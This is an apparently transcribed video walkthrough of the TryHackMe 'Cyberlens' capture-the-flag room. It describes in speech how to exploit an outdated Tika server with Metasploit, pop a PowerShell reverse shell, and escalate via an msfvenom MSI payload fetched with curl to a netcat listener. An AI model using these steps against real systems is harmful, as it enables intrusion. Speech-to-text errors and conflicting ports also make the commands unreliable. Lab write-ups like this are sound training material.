Hi guys, today we are doing Cyberlens CTF on TryHackMe. So let's look at the description. So it's a company called Cyberlens that deals with metadata. So first thing we'll need to do is copy this into our etc host files so we can access this URL. So let's do sudo u first to go to super user. And then paste this in and remove sudo as it did not work for me. Thought it did the other way. So let's enter that, and it's been entered in. So let's have a look at our nmap scan. I did it with the SV for service version and A for aggressive. We can see we have a port 80 server open and a lot of Microsoft going on, so it's probably a Microsoft machine we'll be breaking into. So let's open this. Type in http://cyberlens.tryhackme. And we have a website here. Pretty nice one as well. So we have a website with an image extractor. So let's look at the page source and see what's going on. So let's keep scrolling down as there was a custom upload feature. So okay, we have another server with the port 61777. So let's have a look at that. We have a Tinker server with looks like outdated versions. We might be able to create an exploit with that. So what we can do is go to Metasploit. So let's type in mfs console, and that should start the Metasploit framework for us. So let's search for vulnerability with Metasploit. Let's do search. Let's put that in. And we have an exploit. Let's have a look at another one. Okay, so we could use this, which seems like an interesting one. Let's use 0 options. So okay, what we'll need to do is change these two options as our port is different, and we'll need to put in the IP address of our target machine, and the L host will need to be set to our IP address. So let's go to set our host, and let's change that to our IP address, which is here. Let's set our ports. So what the port of the target web server for us, so that would be 677. So let's copy that, set our ports to that. Oops, I think it was 61777 anyway. Yes, and now our IP address, yours would be different and your target host would be different. So let's do L ports, well L host, sorry, L host. And let's go to, let me go to my OpenVPN, and this will be your OpenVPN connection that you'll be using. So let's paste that in. So now if we do run, we should get remote access. Not vulnerable, wait, let me check if I entered that correctly. Yes, I did. Actually, our ports has not been set. Oops. So let's do our port 16777 options. That has been changed. Let's do run again. Hopefully this should work. As we see, it's just sending metadata to the server. Okay, now we have access. Let's put in shell to give us a shell. And it's been created. So let's type in who am I. So I am Cyberlens, and we're in the system 32 file directory, so we'll need to get out of that. The cd / users Cyberlens .desktop, as you want to get to desktop, and we are in. So let's do dir to list the directory. It's a bit different since it's a Microsoft machine. So to read this, we normally do cat on Linux, but since we're on Windows, we need to do type and user.txt. So yeah, let's copy this. This is the user.txt. Let's submit this. So we've done the user flag. Now we need to do privilege escalation and get the admin flag. Since it's an outdated server, there'll probably be multiple vulnerabilities for this. So what you want to do is copy this and just type it in. And let's type in exploit. We might get something good. So now we have something interesting here. CVE for command injection. So we could use this to get remote access to the system. So let's download this file. Okay, so now we want to click download raw file. Yes, we want it to be in our downloads folder. And what we can do with this is do some privilege escalation. So what we need to do is do ls cd downloads to get to our downloads folder. Let's do -3 exploit, and we want to put in our URL. So Cyberlens .TryHackMe, now part 1777, and now we want to put in our reverse shell, so our command. So what we want to do is go to rev shells. Let's open this and let's get to rev shells. Close these. We don't type in rev shells. Let's go to base64 PowerShell. We want to copy this in. We want to be listening to part 3443, which will be our target port. So let's go here and paste. Well, we need to put exclamation mark, well, parentheses, and another one here. And before we do this, we need to set up an listener. Before I forget, lnvp sudo lnvp, since it will be listening on 443, which is a commonly used port. Press enter. It started, so let's press enter again. And let's see here, and we have got connection back. So let's do who am I, and we are Cyberlens. So let's cd C users, capital users, Cyberlens .des. Let's just do it in, yeah, let's just go to desktop. Let's do pwd. Still in the same path. Let's just do dir. Yeah, we're still in the same path, so then we need to do cd again. C / users Cyberlens desktop. And we are in the desktop now. So what we can do now is create a reverse shell using MSF Venom, which can allow us to get a reverse shell onto this machine. We may be able to do some exploitation, so we can try that. So let's type in MSF Venom -p. We will put Windows /x64 Now we want to put shell dot reverse TCP, put L host, which is us. So mine will be 10.21.80. This will be your Open VPN IP address, your IP address. So let's put 445 for us, -A -x64. Platform will be specifying will be Windows -S MSI -O -rev dot will be rev dot MSI. We'll be saving it as it looks right. So once this is created, we'll need to create a Python server on our local instance. Do python.http server. So we'll be able to send this to our victim's machine. So now let's do curl 10.21.50-80 80-ms rev -msi -o rev -msi. Let's see, we have got it. It has been sent over, which is good. So now what we need to do is rev -msi. Before we do that, we need to create Python server, well, a netcat connection. So netcat-lmvp 445. We need to put sudo, and it should work now. So let's click enter. Hopefully, yes, we have a connection, which is good. Who am I? So now we need to cd c users admin is to desktop, and we are in. So let's do the type admin.txt, and we have got it. We have finally rooted this machine. So let's paste this in. We have run it. If you like this video, please like and subscribe. It costs you nothing and it helps me so much. If you have any questions, leave them down below, as I'll try to answer them.